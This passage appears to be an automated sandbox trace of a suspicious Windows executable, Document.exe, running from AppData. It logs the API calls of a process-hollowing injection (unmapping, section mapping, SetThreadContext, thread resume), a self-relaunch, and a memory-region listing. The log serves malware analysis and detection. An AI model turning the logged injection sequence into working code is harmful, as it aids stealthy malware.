[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0192.329] NtUnmapViewOfSection (ProcessHandle=0xec, BaseAddress=0x400000) returned 0x0 [0192.330] NtCreateSection (in: SectionHandle=0x18f92c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x18f690, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18f92c*=0xfc) returned 0x0 [0192.330] NtMapViewOfSection (in: SectionHandle=0xfc, ProcessHandle=0xffffffff, BaseAddress=0x18f934*=0x0, ZeroBits=0x0, CommitSize=0x2c000, SectionOffset=0x0, ViewSize=0x18f690*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x18f934*=0x1ee0000, SectionOffset=0x0, ViewSize=0x18f690*=0x2c000) returned 0x0 [0192.330] NtMapViewOfSection (in: SectionHandle=0xfc, ProcessHandle=0xec, BaseAddress=0x18f910*=0x400000, ZeroBits=0x0, CommitSize=0x2c000, SectionOffset=0x0, ViewSize=0x18f690*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x18f910*=0x400000, SectionOffset=0x0, ViewSize=0x18f690*=0x2c000) returned 0x0 [0192.333] NtCreateSection (in: SectionHandle=0x18f930, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x18f690, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18f930*=0xf8) returned 0x0 [0192.333] NtMapViewOfSection (in: SectionHandle=0xf8, ProcessHandle=0xec, BaseAddress=0x18f918*=0x0, ZeroBits=0x0, CommitSize=0x1000, SectionOffset=0x0, ViewSize=0x18f690*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x18f918*=0x1a0000, SectionOffset=0x0, ViewSize=0x18f690*=0x1000) returned 0x0 [0192.333] NtMapViewOfSection (in: SectionHandle=0xf8, ProcessHandle=0xffffffff, BaseAddress=0x18f908*=0x0, ZeroBits=0x0, CommitSize=0x1000, SectionOffset=0x0, ViewSize=0x18f690*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x18f908*=0x530000, SectionOffset=0x0, ViewSize=0x18f690*=0x1000) returned 0x0 [0192.334] SetThreadContext (hThread=0xf4, lpContext=0x520000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x4010b8, Ebp=0x0, Eip=0x77e301c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0192.334] NtResumeThread (in: ThreadHandle=0xf4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0192.357] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f420, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0192.357] CallWindowProcW (lpPrevWndFunc=0x3e0004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116060a [0192.357] GetTickCount () returned 0x35d8a [0192.357] wsprintfW (in: param_1=0x18f218, param_2="\"%s\" 2 %i %i" | out: param_1="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 2 2616 18220554") returned 73 [0192.357] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 2 2616 18220554", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f628*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f674 | out: lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 2 2616 18220554", lpProcessInformation=0x18f674*(hProcess=0x104, hThread=0x100, dwProcessId=0xa68, dwThreadId=0x6c8)) returned 1 [0192.359] ExitProcess (uExitCode=0x0) Process: id = "8" image_name = "document.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe" page_root = "0x63b2b000" os_pid = "0xa38" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x81c" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1508 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1509 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1510 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1511 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1512 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1513 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1514 start_va = 0x400000 end_va = 0x4b2fff entry_point = 0x400000 region_type = mapped_file name = "document.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe") Region: id = 1515 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1516 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1517 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1518 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1519 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1520 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1521 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1522 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1523 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1527 start_va = 0x400000 end_va = 0x42bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1528 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1530 start_va = 0x340000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1531 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1532 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1533 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1554 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1555 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1556 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1557 start_va = 0x5c0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1558 start_va = 0x72940000 end_va = 0x72a92fff entry_point = 0x72940000 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 1559 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1560 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1561 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1562 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1563 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1564 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1565 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1566 start_va = 0x760d0000 